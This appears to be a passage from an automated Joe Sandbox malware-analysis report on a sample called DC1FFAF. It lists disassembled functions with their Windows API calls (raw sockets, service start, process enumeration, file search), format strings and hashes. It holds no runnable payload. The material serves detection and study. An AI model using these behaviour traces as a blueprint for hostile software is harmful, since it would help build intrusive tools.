                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1125 69e8e1f0-69e8e26c call 69ec3c70 1128 69e8e270-69e8e293 select 1125->1128 1129 69e8e299 1128->1129 1130 69e8e3e6-69e8e3e8 1128->1130 1132 69e8e2a8-69e8e2c1 recv 1129->1132 1133 69e8e29b-69e8e29f 1129->1133 1131 69e8e674-69e8e69b call 69ebe9d7 1130->1131 1132->1130 1136 69e8e2c7-69e8e2ce 1132->1136 1133->1128 1135 69e8e2a1-69e8e2a3 1133->1135 1135->1131 1136->1130 1138 69e8e2d4-69e8e2d7 1136->1138 1138->1128 1139 69e8e2d9-69e8e2e1 1138->1139 1139->1128 1140 69e8e2e3-69e8e2eb 1139->1140 1140->1128 1141 69e8e2ed-69e8e2f5 1140->1141 1141->1128 1142 69e8e2fb-69e8e303 1141->1142 1142->1128 1143 69e8e309-69e8e32a call 69ebf4c4 1142->1143 1143->1130 1146 69e8e330-69e8e35e call 69ec0968 1143->1146 1146->1130 1149 69e8e364-69e8e36d 1146->1149 1150 69e8e36f-69e8e374 1149->1150 1151 69e8e384-69e8e3a3 call 69e8bf70 1149->1151 1150->1151 1152 69e8e376-69e8e37b 1150->1152 1156 69e8e3bf-69e8e3ca 1151->1156 1157 69e8e3a5-69e8e3b9 call 69ec0f76 1151->1157 1152->1151 1154 69e8e37d-69e8e382 1152->1154 1154->1130 1154->1151 1159 69e8e3cd-69e8e3da 1156->1159 1157->1156 1162 69e8e3bb-69e8e3bd 1157->1162 1159->1130 1161 69e8e3dc-69e8e3e1 1159->1161 1161->1130 1162->1156 1163 69e8e3ed-69e8e40d call 69e8eee0 1162->1163 1166 69e8e40f-69e8e412 1163->1166 1167 69e8e414-69e8e424 call 69ec0f76 1163->1167 1168 69e8e42d-69e8e431 1166->1168 1175 69e8e42b 1167->1175 1176 69e8e426-69e8e429 1167->1176 1170 69e8e433 1168->1170 1171 69e8e435-69e8e437 1168->1171 1170->1171 1173 69e8e43d-69e8e462 call 69e8ef10 1171->1173 1174 69e8e623-69e8e63b 1171->1174 1183 69e8e464-69e8e471 call 69ec1049 1173->1183 1184 69e8e477-69e8e48f 1173->1184 1178 69e8e63d-69e8e642 1174->1178 1179 69e8e647-69e8e666 1174->1179 1175->1168 1176->1168 1178->1179 1180 69e8e668-69e8e66d 1179->1180 1181 69e8e672 1179->1181 1180->1181 1181->1131 1183->1184 1191 69e8e473-69e8e475 1183->1191 1186 69e8e49b-69e8e4b3 1184->1186 1187 69e8e491-69e8e496 1184->1187 1189 69e8e4bf-69e8e4d1 1186->1189 1190 69e8e4b5-69e8e4ba 1186->1190 1187->1186 1189->1159 1190->1189 1191->1184 1192 69e8e4d6-69e8e516 call 69e8eee0 call 69e8c0a0 1191->1192 1197 69e8e518-69e8e51d 1192->1197 1198 69e8e522-69e8e58d call 69ec0968 1192->1198 1197->1198 1198->1184 1201 69e8e593-69e8e59b 1198->1201 1202 69e8e59d-69e8e5ba call 69e85270 * 3 1201->1202 1203 69e8e5bf-69e8e5dd call 69e8bf70 call 69e8fd00 1201->1203 1202->1131 1203->1202 1213 69e8e5df-69e8e61e call 69e8f290 call 69e85270 1203->1213 1213->1174
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E8E250
                                                                                                                                      • select.WS2_32(?,?,?,?,00000000), ref: 69E8E28F
                                                                                                                                      • recv.WS2_32(?,?,00000001,00000000), ref: 69E8E2B9
                                                                                                                                      • _strncmp.LIBCMT ref: 69E8E320
                                                                                                                                      • _swscanf.LIBCMT ref: 69E8E353
                                                                                                                                        • Part of subcall function 69EC0F76: __mbsstr_l.LIBCMT ref: 69EC0F83
                                                                                                                                      • _swscanf.LIBCMT ref: 69E8E582
                                                                                                                                        • Part of subcall function 69EC0968: _vscan_fn.LIBCMT ref: 69EC097F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _swscanf$__mbsstr_l_memset_strncmp_vscan_fnrecvselect
                                                                                                                                      • String ID: %d %s %d %d:%d:%d GMT$Date: $HTTP/$HTTP/%f %d
                                                                                                                                      • API String ID: 2973436612-460920543
                                                                                                                                      • Opcode ID: d2e6718cec62f58b8f598627d2d98a3321b7f38fb8e5ded6470331bea56d1523
                                                                                                                                      • Instruction ID: 122d31937b967c2cfe965b0d6bb6e22f663b6af438e9df4395b8b58be9c883b4
                                                                                                                                      • Opcode Fuzzy Hash: d2e6718cec62f58b8f598627d2d98a3321b7f38fb8e5ded6470331bea56d1523
                                                                                                                                      • Instruction Fuzzy Hash: 55D18471508B419FD714DF68C980BABB7E5BFCA328F608B1DE0AD87291DB319905CB52
                                                                                                                                      Function 69E8F3F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E8F41C
                                                                                                                                      • WSACreateEvent.WS2_32 ref: 69E8F424
                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 69E8F42D
                                                                                                                                      • WSASocketA.WS2_32(00000002,00000003,00000001,00000000,00000000,00000000), ref: 69E8F440
                                                                                                                                      • WSAGetLastError.WS2_32(?,?,00000000), ref: 69E8F44D
                                                                                                                                      • _sprintf.LIBCMT ref: 69E8F45E
                                                                                                                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,00000000), ref: 69E8F46B
                                                                                                                                      • WSAEventSelect.WS2_32(00000000,?,00000001), ref: 69E8F490
                                                                                                                                      • _malloc.LIBCMT ref: 69E8F49F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Event$CreateCurrentDebugErrorLastOutputProcessSelectSocketString_malloc_memset_sprintf
                                                                                                                                      • String ID: WSASocket() failed: %d
                                                                                                                                      • API String ID: 884985324-4110721735
                                                                                                                                      • Opcode ID: 52034680674c54e62e031250a06f7c560334331128302aa4c2a3c0ee2b1fa3ec
                                                                                                                                      • Instruction ID: f84b437409c9cc3a07147fbda94567cd31bab97969d5ee2fe284b0d7790ea303
                                                                                                                                      • Opcode Fuzzy Hash: 52034680674c54e62e031250a06f7c560334331128302aa4c2a3c0ee2b1fa3ec
                                                                                                                                      • Instruction Fuzzy Hash: D22108B59003009FD720DF70D985A6AB7E4BF48714F508D1DF69AC6280E7B59548CB81
                                                                                                                                      Function 00443E10 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _strlen.LIBCMT ref: 00443E6A
                                                                                                                                      • _strlen.LIBCMT ref: 00443EA5
                                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000,?,?,00000000), ref: 00443EEB
                                                                                                                                      • FindNextFileA.KERNEL32(?,000000FF,?,?,?,?,00000000), ref: 0044404B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFind_strlen$FirstNext
                                                                                                                                      • String ID: \*.*
                                                                                                                                      • API String ID: 4205833381-1173974218
                                                                                                                                      • Opcode ID: 53fe5ed4548aa4afe120153156098ee259a9758506ae45cf773cb675687a31ce
                                                                                                                                      • Instruction ID: 0f5d99dfdd25079fa3ea86ab3c65454a96023ed9e4f5d0edf1d68f733b02ef16
                                                                                                                                      • Opcode Fuzzy Hash: 53fe5ed4548aa4afe120153156098ee259a9758506ae45cf773cb675687a31ce
                                                                                                                                      • Instruction Fuzzy Hash: EC617BB1D00118EBDB24DF51DC41BEFB774AF54304F50819AE509A7280EB38AB89CF99
                                                                                                                                      Function 00468010 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen$FileFindFirst
                                                                                                                                      • String ID: \*.*
                                                                                                                                      • API String ID: 734317389-1173974218
                                                                                                                                      • Opcode ID: 0f9a5abd02ac00b5806b02080578bf572e6f056129d6eab1b6e06aac6977bee5
                                                                                                                                      • Instruction ID: 3d7203db8bb497a57c0dfc3f893e2f04af72fef22de39fbe590bcdb67e939212
                                                                                                                                      • Opcode Fuzzy Hash: 0f9a5abd02ac00b5806b02080578bf572e6f056129d6eab1b6e06aac6977bee5
                                                                                                                                      • Instruction Fuzzy Hash: 06816DB1D00118ABDB24DF65DC51BEEB7B4AF44304F1082DEE509A7241EB39AE85CF96
                                                                                                                                      Function 69E88BE0 Relevance: 12.1, APIs: 8, Instructions: 77serviceCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • OpenSCManagerA.SECHOST(00000000,00000000,000F003F,?,?,?,69E890FA), ref: 69E88C00
                                                                                                                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,69E890FA), ref: 69E88C2F
                                                                                                                                      • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,000F01FF,?,?,?,69E890FA), ref: 69E88C40
                                                                                                                                      • GetLastError.KERNEL32(?,000F01FF,?,?,?,69E890FA), ref: 69E88C4A
                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,69E890FA), ref: 69E88C59
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Service$Open$CloseErrorHandleLastManagerStart
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4248622755-0
                                                                                                                                      • Opcode ID: 41b8cb70ee1a15e4b56ef4dbd1873ef5fd5308632a9c5719b82bad74f8fadfe4
                                                                                                                                      • Instruction ID: 278105fbd40d21a81268ffa19c91067f3fc9fdb9449025ded069d615c2213ac3
                                                                                                                                      • Opcode Fuzzy Hash: 41b8cb70ee1a15e4b56ef4dbd1873ef5fd5308632a9c5719b82bad74f8fadfe4
                                                                                                                                      • Instruction Fuzzy Hash: 1F01FE377C322427CB0125AD6D49BEA7398ABC7A37F20016BFA28D7245CF86C40D61A5
                                                                                                                                      Function 004684E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen$FileFindFirst
                                                                                                                                      • String ID: \*.*
                                                                                                                                      • API String ID: 734317389-1173974218
                                                                                                                                      • Opcode ID: ff3217af22453bb9ba294927e3c4a7c3afc75bc508750646089b2dc03991fe0b
                                                                                                                                      • Instruction ID: 4a8451786f94d40fadf7edfe803a9909d28d4af838b8f45ca14bef8bf75b9a5f
                                                                                                                                      • Opcode Fuzzy Hash: ff3217af22453bb9ba294927e3c4a7c3afc75bc508750646089b2dc03991fe0b
                                                                                                                                      • Instruction Fuzzy Hash: D25138B1900118EBDF24DF55DC51BEEB7B4BF54304F50829EE40A66281EB38AB84CF96
                                                                                                                                      Function 69E8B440 Relevance: 9.4, APIs: 1, Strings: 5, Instructions: 406COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,69EF2C98), ref: 69E8B4EA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalInitializeSection
                                                                                                                                      • String ID: %02d_%02d$%04d-%02d-%02d$8$c$v
                                                                                                                                      • API String ID: 32694325-3102721369
                                                                                                                                      • Opcode ID: 97c7313e1fe369c4b2b584a1a2a61ad80afd4d64b9d1751f94eed74f915a7d5a
                                                                                                                                      • Instruction ID: 7d05bc4a0c4c8bc2c382d3d1e9df3ce7d9a70e004fc874bc28211ef45a9a4c3a
                                                                                                                                      • Opcode Fuzzy Hash: 97c7313e1fe369c4b2b584a1a2a61ad80afd4d64b9d1751f94eed74f915a7d5a
                                                                                                                                      • Instruction Fuzzy Hash: 0CE117755047409FC301CFA8C990A5BB7E5FFDA324F288A5DF09A8B291DB34D905CB92
                                                                                                                                      Function 69EB05F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _strcpy_s.LIBCMT ref: 69EB062B
                                                                                                                                        • Part of subcall function 69EC2DCA: __getptd_noexit.LIBCMT ref: 69EC2DCA
                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 69EB0643
                                                                                                                                      • __snwprintf_s.LIBCMT ref: 69EB0678
                                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 69EB06B3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
                                                                                                                                      • String ID: LOC
                                                                                                                                      • API String ID: 1155623865-519433814
                                                                                                                                      • Opcode ID: fc6446824eb0d45335fb48a6442e9566a083395dc5dcf846bbe2f1636d535a83
                                                                                                                                      • Instruction ID: 4cfb4f4e95fe3a7c3184e01b94406e1df0396ff68d76ee37f456b8c719a6051b
                                                                                                                                      • Opcode Fuzzy Hash: fc6446824eb0d45335fb48a6442e9566a083395dc5dcf846bbe2f1636d535a83
                                                                                                                                      • Instruction Fuzzy Hash: A2212774900208EBDB11EB74CF45BDE3768AB46359F3094A9E2149B188DB70DD468AE1
                                                                                                                                      Function 69EA4680 Relevance: 4.6, APIs: 3, Instructions: 63processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 69EA46A5
                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 69EA46D0
                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 69EA4709
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1238713047-0
                                                                                                                                      • Opcode ID: 821e9dfe53baebd7dc1df7970f38b250faba7df1a9b9875c0d07a707d3d848ca
                                                                                                                                      • Instruction ID: 352ee51c5f626fd808e0049de197c4eeb24dc82351eed7ad8a40a8a82a88f6e7
                                                                                                                                      • Opcode Fuzzy Hash: 821e9dfe53baebd7dc1df7970f38b250faba7df1a9b9875c0d07a707d3d848ca
                                                                                                                                      • Instruction Fuzzy Hash: CF11E2751082455FE710CF28C942BBB77E8ABC6308F50862EE9548B290FB31A509C792
                                                                                                                                      Function 0042E7D0 Relevance: 4.1, Strings: 3, Instructions: 395COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ;B$;B$;B
                                                                                                                                      • API String ID: 0-648224903
                                                                                                                                      • Opcode ID: 22e3a424703cf8bdb92729ad4e0024b4fee098acb817eba1f9d4a24036c5d64b
                                                                                                                                      • Instruction ID: 7a01e589e373f79d423ea55c1224c16b71e21714d4325722d4bfbda099aee61c
                                                                                                                                      • Opcode Fuzzy Hash: 22e3a424703cf8bdb92729ad4e0024b4fee098acb817eba1f9d4a24036c5d64b
                                                                                                                                      • Instruction Fuzzy Hash: 0312A474E00228DFDB24CF95C994BDEBBB1BB88304F50829AD909AB385D7745E85CF94
                                                                                                                                      Function 69E8BDB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • FindResourceA.KERNEL32(0000E000,?,00000006), ref: 69E8BDC7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
